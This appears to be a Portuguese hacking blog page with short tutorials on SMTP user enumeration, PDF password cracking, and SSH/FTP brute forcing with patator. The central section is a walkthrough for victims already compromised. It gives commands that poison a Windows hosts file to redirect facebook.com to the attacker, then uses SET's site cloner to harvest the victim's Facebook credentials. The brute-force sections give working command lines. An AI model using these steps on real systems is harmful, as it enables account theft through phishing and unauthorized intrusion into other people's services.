Select Menu

Anuncios !!

smtp-user-enum é uma ferramenta de enumeração de usuários através do serviços smtp. Enumeração é realizada por inspecionar as respostas aos VRFY, EXPN e RCPT TO dos comandos.
Ele pode ser adaptado para trabalhar com outros daemon SMTP vulneraveis, mas isto não tem sido feito a partir da versão  1.0.

Verificando o Serviço


Vamos verificar se o Host alvo o serviço de SMTP está rodando na porta padrão 25.



Layout do help


Confira o help da ferramenta:


Construindo a Wordlist:


Para o nosso exemplo usaremos uma Wordist, Faremos então uma wordlist básica:


Usando :


A usagem mais simples do smtp-enum-user é a seguinte:



1:  smtp-user-enum -U user.txt -t 192.168.0.100

Onde:


      -U : Informa o nome do arquivo onde será feito o teste de cada nome;

      -t : é o host do nosso alvo

Porém você pode adicionar a forma como o scan vai ser efetuado, passando o parametro -M e logo depois o tipo que pode ser: VRFY, EXPN e RCPT TO.


Execução da Ferramenta:


Depois que você pressionar a tecla <ENTER> o resultado devera ser similar a esse:



O resultado foi excelente, de 21 nomes testados 10 existem.


Bom Hacked...
Após uma invasão você tem milhares de coisas que pode fazer, nesse caso simula um exemplo em já se tinha invadido o alvo e o hacker esta se conectando novamente, então as partes anteriores do Teste de invasão foram omitidas. Então vamos lá.

Com o comando echo iremos escrever na ultima linha o ip do atacante e o site que queremos roubar a autenticação, faremos isso para que quando a nossa vitima digitar em seu navegador o endereço que especificamos ela sera redirecionada para o nosso ip. Usaremos o hosts que é um arquivo do computador utilizado pelo sistema operacional destinado a relacionar os hostnames e endereços ip,
ele esta dentro de C:/WINDOWS/system32/drivers/etc/

Comandos: 


1:  echo 192.168.0.102  www.facebook.com >> C:\\WINDOWS\\system32\\drivers\\etc\\hosts   
2:  echo 192.168.0.102  pt-br.facebook.com >> C:\\WINDOWS\\system32\\drivers\\etc\\hosts   

Vamos verificar o arquivo host: 

Comando:

1:  type C:\\WINDOWS\\system32\\drivers\\etc\\hosts   

Uma vez que ocorreu tudo ok podemos abrir uma nova aba e usar o setoolkit para clonar o nosso site as opções são 1 2 3 2, você digita o seu ip o site que quer clonar.

 root@kali~# setookit  
 1) Social-Engineering Attacks  
 2) Website Attack Vectors  
 3) Credential Harvester Attack Method   
 2) Site Cloner  
 192.168.0.102  
 https://www.facebook.com  
O Set vai mandar tudo para o diretorio /var /www/ ele gera 3 arquivos.

Quando o alvo digitar www.facebook.com ele sera direcionado para o nosso ip que por sua vez está com o facebook clonado
Vualá após a vitima logar você terá as credências dentro do arquivo harverster_* :D
Boa Sorte e Bom Hacker ...

Sobre PDFCrack

PDFCrack é um GNU / Linux (outros sistemas POSIX-compatíveis deve funcionar também) ferramenta para a recuperação de senhas e conteúdo de arquivos PDF. É pequena linha, comando conduzido sem dependências externas. A aplicação é Open Source (GPL).

Características

Suporta o manipulador padrão de segurança (revisão 2, 3 e 4) em todas as versões PDF-conhecidos
Suporta cracks tanto o proprietário e userpasswords
Ambas as listas de palavras e bruteforcing a senha é suportada
Permutações simples (atualmente apenas tentando primeiro caractere como Maiúsculas)
Salvar / Carregar um trabalho em execução
Aferição Simples
Busca Optimizado para proprietário por senha quando o usuário-senha é conhecida

http://pdfcrack.sourceforge.net/



O pdfcrack não vem por padrão no Kali Linux, porém a instalação é defult:

# apt-get install pdfcrack

Um abraço a todos e até a próxima!

O patator é um script criado em python para proporcionar uma nova experiencia ao usuário. Patator é um multi-purpose bruta forcer, com um design modular e um uso flexível.

Ele suporta os seguintes modulos:






Para saber detalhes sobre um determinado modulo você digita:

# patator <modulo> -h


ex: patator ssh_login -h



Quebrando senhas SSH:

A usagem não é muito simples no começo é algo um pouco confuso, mas com o tempo você acaba se acostumando e vendo o quanto essa ferramenta tão eficaz é tão simples de usar, sem mais delongas a sintaxe é a seguinte:

# patator ssh_login host=192.168.0.5 user=FILE0 password=FILEE1 0=logins.txt 1=senhas.txt -x ignore:mesg='Authentication failed.'

onde: host : especificamos o nosso alvo;

user: informamos ao programa que o usuário se encontra no File ( arquivo ) 0;

password:  informamos ao programa que a senha se encontra no File 1;

0 e 1 : é onde diremos onde estão as nossas listas de usuário e senha;

-x : são passados ações:condições, no nosso exemplo mandamos ignorar a mensagem "Authentication failed.", dessa forma o programa só ira exibir resultados positivos.



Quebrando senhas de FTP

Com o FTP não a muitas mudanças, a sintaxe não se altera muito, vejamos:

# patator ftp_login user=FILE0 password=FILE1 0=logins.txt 1=senhas.txt  -x ignore,reset,retry:code=500 -x ignore:mesg='Login Incorrect.'

O que adicionamos aqui foi o primeiro -x, onde mandamos ele ignorar, redefinir ou tentar novamente quando o codigo 500 aparecer, mudamos também a mensagem ignorada de erro.


Pagina do Projeto: https://code.google.com/p/patator/